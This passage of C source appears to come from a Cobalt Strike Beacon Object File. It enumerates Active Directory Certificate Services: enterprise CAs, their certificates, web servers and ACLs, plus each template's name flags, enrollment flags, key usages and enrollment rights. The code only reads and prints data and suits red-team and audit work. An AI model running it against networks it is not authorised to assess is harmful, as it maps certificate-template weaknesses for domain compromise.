CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->GetTemplates()", hr);
hr = pCertificateTemplates->lpVtbl->get_Count(pCertificateTemplates, &lCertificateTemplatesCount);
CHECK_RETURN_FAIL("pCertificateTemplates->lpVtbl->get_Count()", hr);
internal_printf("\n[*] Found %ld templates\n", lCertificateTemplatesCount);
for(LONG lCertificateTemplatesIndex=0; lCertificateTemplatesIndex<lCertificateTemplatesCount; lCertificateTemplatesIndex++)
{
SAFE_RELEASE(pCertificateTemplate);
hr = pCertificateTemplates->lpVtbl->get_ItemByIndex(pCertificateTemplates, lCertificateTemplatesIndex, &pCertificateTemplate);
CHECK_RETURN_FAIL("pCertificateTemplates->lpVtbl->get_ItemByIndex()", hr);
hr = _adcs_get_CertificateTemplate(pCertificateTemplate);
CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_CertificateTemplate()", hr);
if (FAILED(hr)){
internal_printf(" Failed to display information for the CertificateTemplate \n");
}
} // end for loop through ITemplates
hr = S_OK;
//internal_printf("\n _adcs_get_EnrollmentPolicyServer SUCCESS.\n");
fail:
SAFE_RELEASE(pCertificateAuthority);
SAFE_RELEASE(pCAs);
SAFE_RELEASE(pEnrollmentPolicyServer);
return hr;
} // end _adcs_get_EnrollmentPolicyServer
HRESULT _adcs_get_CertificationAuthority(ICertificationAuthority * pCertificateAuthority)
{
HRESULT hr = S_OK;
VARIANT varProperty;
OLEAUT32$VariantInit(&varProperty);
OLEAUT32$VariantClear(&varProperty);
pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCommonName, &varProperty);
CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCommonName)", hr);
internal_printf("\n[*] Listing info about the Enterprise CA '%S'\n", varProperty.bstrVal);
internal_printf(" Enterprise CA Name : %S\n", varProperty.bstrVal);
OLEAUT32$VariantClear(&varProperty);
pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropDNSName, &varProperty);
CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropDNSName)", hr);
internal_printf(" DNS Hostname : %S\n", varProperty.bstrVal);
OLEAUT32$VariantClear(&varProperty);
pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropDistinguishedName, &varProperty);
CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropDistinguishedName)", hr);
if (varProperty.pdispVal)
{
BSTR bstrName = NULL;
IX500DistinguishedName * pDistinguishedName = (IX500DistinguishedName*)varProperty.pdispVal;
hr = pDistinguishedName->lpVtbl->get_Name(pDistinguishedName, &bstrName);
CHECK_RETURN_FAIL("pDistinguishedName->lpVtbl->get_Name()", hr);
internal_printf(" Distinguished Name : %S\n", bstrName);
}
OLEAUT32$VariantClear(&varProperty);
pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCertificate, &varProperty);
CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCertificate)", hr);
internal_printf(" CA Certificate :\n");
hr = _adcs_get_CertificationAuthorityCertificate(&varProperty);
CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityCertificate()", hr);
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropSecurity, &varProperty);
CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropSecurity)", hr);
internal_printf(" CA Permissions :\n");
hr = _adcs_get_CertificationAuthoritySecurity(varProperty.bstrVal);
CHECK_RETURN_FAIL("_adcs_get_CertificationAuthoritySecurity()", hr);
OLEAUT32$VariantClear(&varProperty);
pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropWebServers, &varProperty);
internal_printf(" Web Servers :\n");
hr = _adcs_get_CertificationAuthorityWebServers(&varProperty);
CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityWebServers()", hr);
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCertificateTypes, &varProperty);
// CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCertificateTypes)", hr);
internal_printf(" Templates :\n");
hr = _adcs_get_CertificationAuthorityCertificateTypes(&varProperty);
CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityCertificateTypes()", hr);
hr = S_OK;
//internal_printf("\n _adcs_get_CertificationAuthority SUCCESS.\n");
fail:
OLEAUT32$VariantClear(&varProperty);
return hr;
} // end _adcs_get_CertificationAuthority
HRESULT _adcs_get_CertificationAuthorityCertificate(VARIANT* lpvarCertifcate)
{
HRESULT hr = S_OK;
LPBYTE lpCertificate = NULL;
ULONG ulCertificateSize = 0;
PCCERT_CONTEXT pCert = NULL;
BOOL bReturn = TRUE;
DWORD dwStrType = CERT_X500_NAME_STR;
LPWSTR swzNameString = NULL;
DWORD cchNameString = 0;
PBYTE lpThumbprint = NULL;
DWORD cThumbprint = 0;
SYSTEMTIME systemTime;
CERT_CHAIN_PARA chainPara;
PCCERT_CHAIN_CONTEXT pCertChainContext = NULL;
// check buffer
if (NULL == lpvarCertifcate->parray)
{
internal_printf(" N/A\n");
goto fail;
}
// Get a certificate context
ulCertificateSize = lpvarCertifcate->parray->rgsabound->cElements;
hr = OLEAUT32$SafeArrayAccessData( lpvarCertifcate->parray, (void**)(&lpCertificate) );
CHECK_RETURN_FAIL("SafeArrayAccessData", hr);
pCert = CRYPT32$CertCreateCertificateContext( 1, lpCertificate, ulCertificateSize );
hr = OLEAUT32$SafeArrayUnaccessData( lpvarCertifcate->parray );
CHECK_RETURN_FAIL("SafeArrayUnaccessData", hr);
CHECK_RETURN_NULL("CertCreateCertificateContext()", pCert, hr);
// subject name
cchNameString = CRYPT32$CertGetNameStringW( pCert, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString );
swzNameString = intAlloc(cchNameString*sizeof(WCHAR));
CHECK_RETURN_NULL("intAlloc()", swzNameString, hr);
if (1 == CRYPT32$CertGetNameStringW( pCert, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString ))
{
hr = E_UNEXPECTED;
BeaconPrintf(CALLBACK_ERROR, "CertGetNameStringW failed: 0x%08lx\n", hr);
goto fail;
}
internal_printf(" Subject Name : %S\n", swzNameString);
SAFE_INT_FREE(swzNameString);
// thumbprint
CRYPT32$CertGetCertificateContextProperty( pCert, CERT_SHA1_HASH_PROP_ID, lpThumbprint, &cThumbprint );
lpThumbprint = intAlloc(cThumbprint);
CHECK_RETURN_NULL("intAlloc()", lpThumbprint, hr);
bReturn = CRYPT32$CertGetCertificateContextProperty( pCert, CERT_SHA1_HASH_PROP_ID, lpThumbprint, &cThumbprint );
CHECK_RETURN_FALSE("CertGetCertificateContextProperty(CERT_SHA1_HASH_PROP_ID)", bReturn, hr);
internal_printf(" Thumbprint : ");
for(DWORD i=0; i<cThumbprint; i++)
{
internal_printf("%02x", lpThumbprint[i]);
}
internal_printf("\n");
SAFE_INT_FREE(lpThumbprint);
// serial number
internal_printf(" Serial Number : ");
for(DWORD i=0; i<pCert->pCertInfo->SerialNumber.cbData; i++)
{
internal_printf("%02x", pCert->pCertInfo->SerialNumber.pbData[i]);
}
internal_printf("\n");
// start date
MSVCRT$memset(&systemTime, 0, sizeof(SYSTEMTIME));
KERNEL32$FileTimeToSystemTime(&(pCert->pCertInfo->NotBefore), &systemTime);
internal_printf(" Start Date : %hu/%hu/%hu %02hu:%02hu:%02hu\n", systemTime.wMonth, systemTime.wDay, systemTime.wYear, systemTime.wHour, systemTime.wMinute, systemTime.wSecond);
// end date
MSVCRT$memset(&systemTime, 0, sizeof(SYSTEMTIME));
KERNEL32$FileTimeToSystemTime(&(pCert->pCertInfo->NotAfter), &systemTime);
internal_printf(" End Date : %hu/%hu/%hu %02hu:%02hu:%02hu\n", systemTime.wMonth, systemTime.wDay, systemTime.wYear, systemTime.wHour, systemTime.wMinute, systemTime.wSecond);
// chain
chainPara.cbSize = sizeof(CERT_CHAIN_PARA);
chainPara.RequestedUsage.dwType = USAGE_MATCH_TYPE_AND;
chainPara.RequestedUsage.Usage.cUsageIdentifier = 0;
chainPara.RequestedUsage.Usage.rgpszUsageIdentifier = NULL;
bReturn = CRYPT32$CertGetCertificateChain( NULL, pCert, NULL, NULL, &chainPara, 0, NULL, &pCertChainContext );
CHECK_RETURN_FALSE("CertGetCertificateChain()", bReturn, hr);
internal_printf(" Chain :");
for(DWORD i=0; i<pCertChainContext->cChain; i++)
{
for(DWORD j=0; j<pCertChainContext->rgpChain[i]->cElement; j++)
{
PCCERT_CONTEXT pChainCertContext = pCertChainContext->rgpChain[i]->rgpElement[j]->pCertContext;
// subject name
cchNameString = CRYPT32$CertGetNameStringW( pChainCertContext, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString );
swzNameString = intAlloc(cchNameString*sizeof(WCHAR));
CHECK_RETURN_NULL("intAlloc()", swzNameString, hr);
if (1 == CRYPT32$CertGetNameStringW( pChainCertContext, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString ))
{
hr = E_UNEXPECTED;
BeaconPrintf(CALLBACK_ERROR, "CertGetNameStringW failed: 0x%08lx\n", hr);
goto fail;
}
if (j!=0) { internal_printf(" >>"); }
internal_printf(" %S", swzNameString);
SAFE_INT_FREE(swzNameString);
} // end for loop through PCERT_CHAIN_ELEMENT
internal_printf("\n");
} // end for loop through PCERT_SIMPLE_CHAIN
hr = S_OK;
//internal_printf("\n _adcs_get_CertificationAuthorityCertificate SUCCESS.\n");
fail:
SAFE_CERTFREECERTIFICATECHAIN(pCertChainContext);
SAFE_INT_FREE(swzNameString);
SAFE_INT_FREE(lpThumbprint);
if (pCert)
{
CRYPT32$CertFreeCertificateContext(pCert);
pCert = NULL;
}
return hr;
} // end _adcs_get_CertificationAuthorityCertificate
HRESULT _adcs_get_CertificationAuthorityWebServers(VARIANT* lpvarWebServers)
{
HRESULT hr = S_OK;
LONG lItemIdx = 0;
BSTR bstrWebServer = NULL;
LPWSTR swzTokenize = NULL;
if ( NULL == lpvarWebServers->parray)
{
internal_printf(" N/A\n");
goto fail;
}
hr = OLEAUT32$SafeArrayGetElement(lpvarWebServers->parray, &lItemIdx, &bstrWebServer);
while(SUCCEEDED(hr))
{
ULONG dwWebServerCount = 0;
LPWSTR swzToken = NULL;
LPWSTR swzNextToken = NULL;
UINT dwTokenizeLength = OLEAUT32$SysStringLen(bstrWebServer);
swzTokenize = (LPWSTR)intAlloc(sizeof(WCHAR)*(dwTokenizeLength+1));
CHECK_RETURN_NULL("intAlloc()", swzTokenize, hr);
MSVCRT$wcscpy(swzTokenize, bstrWebServer);
// Get the number of entries in the array
swzToken = MSVCRT$wcstok_s(swzTokenize, L"\n", &swzNextToken);
dwWebServerCount = MSVCRT$wcstoul(swzToken, NULL, 10);
for(ULONG ulWebEnrollmentServerIndex=0; ulWebEnrollmentServerIndex<dwWebServerCount; ulWebEnrollmentServerIndex++)
{
// Get the authentication type
swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
if (NULL == swzToken) { break; }
// Get the Priority
swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
if (NULL == swzToken) { break; }
// Get the Uri
swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
if (NULL == swzToken) { break; }
internal_printf(" %S\n", swzToken);
// Get the RenewalOnly flag
swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
if (NULL == swzToken) { break; }
}
SAFE_INT_FREE(swzTokenize);
++lItemIdx;
hr = OLEAUT32$SafeArrayGetElement(lpvarWebServers->parray, &lItemIdx, &bstrWebServer);
}
hr = S_OK;
//internal_printf("\n _adcs_get_CertificationAuthorityWebServers SUCCESS.\n");
fail:
SAFE_INT_FREE(swzTokenize);
return hr;
} // end _adcs_get_CertificationAuthorityWebServers
HRESULT _adcs_get_CertificationAuthoritySecurity(BSTR bstrDacl)
{
HRESULT hr = S_OK;
BOOL bReturn = TRUE;
PSID pOwner = NULL;
BOOL bOwnerDefaulted = TRUE;
LPWSTR swzStringSid = NULL;
WCHAR swzName[MAX_PATH];
DWORD cchName = MAX_PATH;
WCHAR swzDomainName[MAX_PATH];
DWORD cchDomainName = MAX_PATH;
BOOL bDaclPresent = TRUE;
PACL pDacl = NULL;
BOOL bDaclDefaulted = TRUE;
ACL_SIZE_INFORMATION aclSizeInformation;
SID_NAME_USE sidNameUse;
PSECURITY_DESCRIPTOR pSD = NULL;
ULONG ulSDSize = 0;
// Get the security descriptor
if (NULL == bstrDacl)
{
internal_printf(" N/A\n");
goto fail;
}
bReturn = ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(bstrDacl, SDDL_REVISION_1, (PSECURITY_DESCRIPTOR)(&pSD), &ulSDSize);
CHECK_RETURN_FALSE("ConvertStringSecurityDescriptorToSecurityDescriptorW()", bReturn, hr);
// Get the owner
bReturn = ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &bOwnerDefaulted);
CHECK_RETURN_FALSE("GetSecurityDescriptorOwner()", bReturn, hr);
internal_printf(" Owner : ");
cchName = MAX_PATH;
MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
cchDomainName = MAX_PATH;
MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
if (ADVAPI32$LookupAccountSidW( NULL, pOwner, swzName, &cchName, swzDomainName, &cchDomainName, &sidNameUse )) { internal_printf("%S\\%S", swzDomainName, swzName); }
else { internal_printf("N/A"); }
// Get the owner's SID
if (ADVAPI32$ConvertSidToStringSidW(pOwner, &swzStringSid)) { internal_printf("\n %S\n", swzStringSid); }
else { internal_printf("\n N/A\n"); }
SAFE_LOCAL_FREE(swzStringSid);
// Get the DACL
bReturn = ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted);
CHECK_RETURN_FALSE("GetSecurityDescriptorDacl()", bReturn, hr);
internal_printf(" Access Rights :\n");
if (FALSE == bDaclPresent) { internal_printf(" N/A\n"); goto fail; }
// Loop through the ACEs in the ACL
if ( ADVAPI32$GetAclInformation( pDacl, &aclSizeInformation, sizeof(aclSizeInformation), AclSizeInformation ) )
{
for(DWORD dwAceIndex=0; dwAceIndex<aclSizeInformation.AceCount; dwAceIndex++)
{
ACE_HEADER * pAceHeader = NULL;
ACCESS_ALLOWED_ACE* pAce = NULL;
ACCESS_ALLOWED_OBJECT_ACE* pAceObject = NULL;
PSID pPrincipalSid = NULL;
hr = E_UNEXPECTED;
if ( ADVAPI32$GetAce( pDacl, dwAceIndex, (LPVOID)&pAceHeader ) )
{
pAceObject = (ACCESS_ALLOWED_OBJECT_ACE*)pAceHeader;
pAce = (ACCESS_ALLOWED_ACE*)pAceHeader;
int format_ACCESS_ALLOWED_OBJECT_ACE = 0;
if (ACCESS_ALLOWED_OBJECT_ACE_TYPE == pAceHeader->AceType) {
//internal_printf(" AceType: ACCESS_ALLOWED_OBJECT_ACE_TYPE\n");
format_ACCESS_ALLOWED_OBJECT_ACE = 1;
pPrincipalSid = (PSID)(&(pAceObject->InheritedObjectType));
}
else if (ACCESS_ALLOWED_ACE_TYPE == pAceHeader->AceType) {
//internal_printf(" AceType: ACCESS_ALLOWED_ACE_TYPE\n");
pPrincipalSid = (PSID)(&(pAce->SidStart));
}
else { continue; }
// Get the principal
cchName = MAX_PATH;
MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
cchDomainName = MAX_PATH;
MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
if (FALSE == ADVAPI32$LookupAccountSidW( NULL, pPrincipalSid, swzName, &cchName, swzDomainName, &cchDomainName, &sidNameUse ))
{ continue; }
swzStringSid = NULL;
if (ADVAPI32$ConvertSidToStringSidW(pPrincipalSid, &swzStringSid)) {
internal_printf(" Principal : %S\\%S (%S)\n", swzDomainName, swzName,swzStringSid); }
else {
internal_printf(" Principal : %S\\%S (N/A)\n", swzDomainName, swzName); }
SAFE_LOCAL_FREE(swzStringSid);
// pAceObject->Mask is always equal to pAce->Mask, not "perfect" but seems to work
internal_printf(" Access mask : %08X\n", pAceObject->Mask);
internal_printf(" Flags : %08X\n", pAceObject->Flags);
if (format_ACCESS_ALLOWED_OBJECT_ACE) {
// flags not defined in ACCESS_ALLOWED_ACE_TYPE
internal_printf(" Flags : %08X\n", pAceObject->Flags);
// Check if Enrollment permission
if (ADS_RIGHT_DS_CONTROL_ACCESS & pAceObject->Mask)
{
if (ACE_OBJECT_TYPE_PRESENT & pAceObject->Flags)
{
OLECHAR szGuid[MAX_PATH];
if ( OLE32$StringFromGUID2(&pAceObject->ObjectType, szGuid, MAX_PATH) )
{
internal_printf(" Extended right %S\n", szGuid);
}
if (
(!MSVCRT$memcmp(&CertificateEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
(!MSVCRT$memcmp(&CertificateAutoEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
(!MSVCRT$memcmp(&CertificateAll, &pAceObject->ObjectType, sizeof (GUID)))
)
{
internal_printf(" Enrollment Rights\n");
}
else if (
(!MSVCRT$memcmp(&ManageCA, &pAceObject->ObjectType, sizeof (GUID)))
)
{
internal_printf(" ManageCA Rights\n");
}
} // end if ACE_OBJECT_TYPE_PRESENT
} // end if ADS_RIGHT_DS_CONTROL_ACCESS
}
// Check if ADS_RIGHT_GENERIC_ALL permission
if (ADS_RIGHT_GENERIC_ALL & pAceObject->Mask)
{
internal_printf(" Generic All Rights\n");
} // end if ADS_RIGHT_GENERIC_ALL permission
// Check if ADS_RIGHT_READ_CONTROL permission
if (
(ADS_RIGHT_READ_CONTROL & pAceObject->Mask)
)
{
internal_printf(" Read Rights\n");
} // end if ADS_RIGHT_READ_CONTROL permission
// Check if ADS_RIGHT_WRITE_OWNER permission
if (
(ADS_RIGHT_WRITE_OWNER & pAceObject->Mask)
)
{
internal_printf(" WriteOwner Rights\n");
} // end if ADS_RIGHT_WRITE_OWNER permission
// Check if ADS_RIGHT_WRITE_DAC permission
if (
(ADS_RIGHT_WRITE_DAC & pAceObject->Mask)
)
{
internal_printf(" WriteDacl Rights\n");
} // end if ADS_RIGHT_WRITE_DAC permission
// Check if ADS_RIGHT_GENERIC_WRITE permission
if (
(ADS_RIGHT_GENERIC_WRITE & pAceObject->Mask)
)
{
internal_printf(" WriteProperty All Rights\n");
} // end if ADS_RIGHT_GENERIC_WRITE permission
// Check if ADS_RIGHT_DS_WRITE_PROP permission
if (
(ADS_RIGHT_DS_WRITE_PROP & pAceObject->Mask)
)
{
if (format_ACCESS_ALLOWED_OBJECT_ACE) {
internal_printf(" WriteProperty Rights on ");
OLECHAR szGuid[MAX_PATH];
if ( OLE32$StringFromGUID2(&pAceObject->ObjectType, szGuid, MAX_PATH) )
{
internal_printf("%S\n", szGuid);
}
else
{
internal_printf("{ERROR}\n");
}
}
else {
// if ACCESS_OBJECT_ACE, there is no ACE_OBJECT_TYPE_PRESENT and ObjectType, so it's like a GENERIC_WRITE
internal_printf(" WriteProperty All Rights\n");
}
} // end if ADS_RIGHT_DS_WRITE_PROP permission
} // end if GetAce was successful
} // end for loop through ACEs (AceCount)
} // end else GetAclInformation was successful
hr = S_OK;
//internal_printf("\n _adcs_get_CertificationAuthoritySecurity SUCCESS.\n");
fail:
SAFE_LOCAL_FREE(swzStringSid);
SAFE_LOCAL_FREE(pSD);
return hr;
} // end _adcs_get_CertificationAuthoritySecurity
HRESULT _adcs_get_CertificationAuthorityCertificateTypes(VARIANT* lpvarArray)
{
HRESULT hr = S_OK;
LONG lItemIdx = 0;
BSTR bstrItem = NULL;
if (NULL == lpvarArray->parray)
{
internal_printf(" N/A\n");
goto fail;
}
hr = OLEAUT32$SafeArrayGetElement(lpvarArray->parray, &lItemIdx, &bstrItem);
while(SUCCEEDED(hr))
{
if (bstrItem) { internal_printf(" %S\n", bstrItem); }
else { internal_printf(" N/A\n"); }
++lItemIdx;
hr = OLEAUT32$SafeArrayGetElement(lpvarArray->parray, &lItemIdx, &bstrItem);
}
hr = S_OK;
//internal_printf("\n _adcs_get_CertificationAuthorityCertificateTypes SUCCESS.\n");
fail:
return hr;
} // end _adcs_get_CertificationAuthorityCertificateTypes
HRESULT _adcs_get_CertificateTemplate(IX509CertificateTemplate * pCertificateTemplate)
{
HRESULT hr = S_OK;
VARIANT varProperty;
OLEAUT32$VariantInit(&varProperty);
// Get the TemplatePropCommonName
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropCommonName, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropCommonName)", hr);
internal_printf("\n[*] Listing info about the template '%S'\n", varProperty.bstrVal);
internal_printf(" Template Name : %S\n", varProperty.bstrVal);
// Get the TemplatePropFriendlyName
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropFriendlyName, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropFriendlyName)", hr);
internal_printf(" Template Friendly Name : %S\n", varProperty.bstrVal);
// Get the TemplatePropValidityPeriod
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropValidityPeriod, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropValidityPeriod)", hr);
internal_printf(" Validity Period : %ld years (%ld seconds)\n", varProperty.lVal/31536000, varProperty.lVal);
// Get the TemplatePropRenewalPeriod
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropRenewalPeriod, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropRenewalPeriod)", hr);
internal_printf(" Renewal Period : %ld days (%ld seconds)\n", varProperty.lVal/86400, varProperty.lVal);
// Get the TemplatePropSubjectNameFlags
// See https://docs.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509certificatetemplatesubjectnameflag
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropSubjectNameFlags, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropSubjectNameFlags)", hr);
internal_printf(" Name Flags :");
if(SubjectNameEnrolleeSupplies & varProperty.intVal) { internal_printf(" SubjectNameEnrolleeSupplies"); }
if(SubjectNameRequireDirectoryPath & varProperty.intVal) { internal_printf(" SubjectNameRequireDirectoryPath"); }
if(SubjectNameRequireCommonName & varProperty.intVal) { internal_printf(" SubjectNameRequireCommonName"); }
if(SubjectNameRequireEmail & varProperty.intVal) { internal_printf(" SubjectNameRequireEmail"); }
if(SubjectNameRequireDNS & varProperty.intVal) { internal_printf(" SubjectNameRequireDNS"); }
if(SubjectNameAndAlternativeNameOldCertSupplies & varProperty.intVal) { internal_printf(" SubjectNameAndAlternativeNameOldCertSupplies"); }
if(SubjectAlternativeNameEnrolleeSupplies & varProperty.intVal) { internal_printf(" SubjectAlternativeNameEnrolleeSupplies"); }
if(SubjectAlternativeNameRequireDirectoryGUID & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDirectoryGUID"); }
if(SubjectAlternativeNameRequireUPN & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireUPN"); }
if(SubjectAlternativeNameRequireEmail & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireEmail"); }
if(SubjectAlternativeNameRequireSPN & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireSPN"); }
if(SubjectAlternativeNameRequireDNS & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDNS"); }
if(SubjectAlternativeNameRequireDomainDNS & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDomainDNS"); }
internal_printf("\n");
// Get the TemplatePropEnrollmentFlags
// See https://docs.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509certificatetemplateenrollmentflag
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropEnrollmentFlags, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropEnrollmentFlags)", hr);
internal_printf(" Enrollment Flags :");
if(EnrollmentIncludeSymmetricAlgorithms & varProperty.intVal) { internal_printf(" EnrollmentIncludeSymmetricAlgorithms"); }
if(EnrollmentPendAllRequests & varProperty.intVal) { internal_printf(" EnrollmentPendAllRequests"); }
if(EnrollmentPublishToKRAContainer & varProperty.intVal) { internal_printf(" EnrollmentPublishToKRAContainer"); }
if(EnrollmentPublishToDS & varProperty.intVal) { internal_printf(" EnrollmentPublishToDS"); }
if(EnrollmentAutoEnrollmentCheckUserDSCertificate & varProperty.intVal) { internal_printf(" EnrollmentAutoEnrollmentCheckUserDSCertificate"); }
if(EnrollmentAutoEnrollment & varProperty.intVal) { internal_printf(" EnrollmentAutoEnrollment"); }
if(EnrollmentDomainAuthenticationNotRequired & varProperty.intVal) { internal_printf(" EnrollmentDomainAuthenticationNotRequired"); }
if(EnrollmentPreviousApprovalValidateReenrollment & varProperty.intVal) { internal_printf(" EnrollmentPreviousApprovalValidateReenrollment"); }
if(EnrollmentUserInteractionRequired & varProperty.intVal) { internal_printf(" EnrollmentUserInteractionRequired"); }
if(EnrollmentAddTemplateName & varProperty.intVal) { internal_printf(" EnrollmentAddTemplateName"); }
if(EnrollmentRemoveInvalidCertificateFromPersonalStore & varProperty.intVal) { internal_printf(" EnrollmentRemoveInvalidCertificateFromPersonalStore"); }
if(EnrollmentAllowEnrollOnBehalfOf & varProperty.intVal) { internal_printf(" EnrollmentAllowEnrollOnBehalfOf"); }
if(EnrollmentAddOCSPNoCheck & varProperty.intVal) { internal_printf(" EnrollmentAddOCSPNoCheck"); }
if(EnrollmentReuseKeyOnFullSmartCard & varProperty.intVal) { internal_printf(" EnrollmentReuseKeyOnFullSmartCard"); }
if(EnrollmentNoRevocationInfoInCerts & varProperty.intVal) { internal_printf(" EnrollmentNoRevocationInfoInCerts"); }
if(EnrollmentIncludeBasicConstraintsForEECerts & varProperty.intVal) { internal_printf(" EnrollmentIncludeBasicConstraintsForEECerts"); }
internal_printf("\n");
// Get the TemplatePropRASignatureCount
OLEAUT32$VariantClear(&varProperty);
hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropRASignatureCount, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropRASignatureCount)", hr);
internal_printf(" Signatures Required : %d\n", varProperty.intVal);
// Get the TemplatePropEKUs
OLEAUT32$VariantClear(&varProperty);
pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropEKUs, &varProperty);
internal_printf(" Extended Key Usages :\n");
hr = _adcs_get_CertificateTemplateExtendedKeyUsages(&varProperty);
CHECK_RETURN_FAIL("_adcs_get_CertificateTemplateExtendedKeyUsages", hr);
// Get the TemplatePropKeySecurityDescriptor
OLEAUT32$VariantClear(&varProperty);
pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropSecurityDescriptor, &varProperty);
CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropSecurityDescriptor)", hr);
internal_printf(" Permissions :\n");
hr = _adcs_get_CertificateTemplateSecurity(varProperty.bstrVal);
CHECK_RETURN_FAIL("_adcs_get_CertificateTemplateSecurity", hr);
hr = S_OK;
//internal_printf("\n _adcs_get_CertificateTemplate SUCCESS.\n");
fail:
OLEAUT32$VariantClear(&varProperty);
return hr;
} // end _adcs_get_CertificateTemplate
HRESULT _adcs_get_CertificateTemplateExtendedKeyUsages(VARIANT* lpvarExtendedKeyUsages)
{
HRESULT hr = S_OK;
IObjectIds * pObjectIds = NULL;
IEnumVARIANT *pEnum = NULL;
LPUNKNOWN pUnk = NULL;
VARIANT var;
IDispatch *pDisp = NULL;
ULONG lFetch = 0;
IObjectId * pObjectId = NULL;
BSTR bstFriendlyName = NULL;
IID IID_IEnumVARIANT = { 0x00020404, 0x0000, 0x0000, {0xc0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46} };
IID IID_IObjectId = { 0x728ab300, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
OLEAUT32$VariantInit(&var);
if (NULL == lpvarExtendedKeyUsages->pdispVal)
{
internal_printf(" N/A\n");
goto fail;
}
pObjectIds = (IObjectIds*)lpvarExtendedKeyUsages->pdispVal;
pObjectIds->lpVtbl->get__NewEnum(pObjectIds, &pUnk);
SAFE_RELEASE(pObjectIds);
pUnk->lpVtbl->QueryInterface(pUnk, &IID_IEnumVARIANT, (void**) &pEnum);
SAFE_RELEASE(pUnk);
OLEAUT32$VariantInit(&var);
hr = pEnum->lpVtbl->Next(pEnum, 1, &var, &lFetch);
while(SUCCEEDED(hr) && lFetch > 0)
{
if (lFetch == 1)
{
pDisp = V_DISPATCH(&var);
pDisp->lpVtbl->QueryInterface(pDisp, &IID_IObjectId, (void**)&pObjectId);
SAFE_RELEASE(pDisp);
hr = pObjectId->lpVtbl->get_FriendlyName(
pObjectId,
&bstFriendlyName
);
if (FAILED(hr)) { internal_printf(" N/A\n"); }
else {
internal_printf(" %S\n", bstFriendlyName);
SAFE_FREE(bstFriendlyName);
}
SAFE_RELEASE(pObjectId);
}
OLEAUT32$VariantClear(&var);
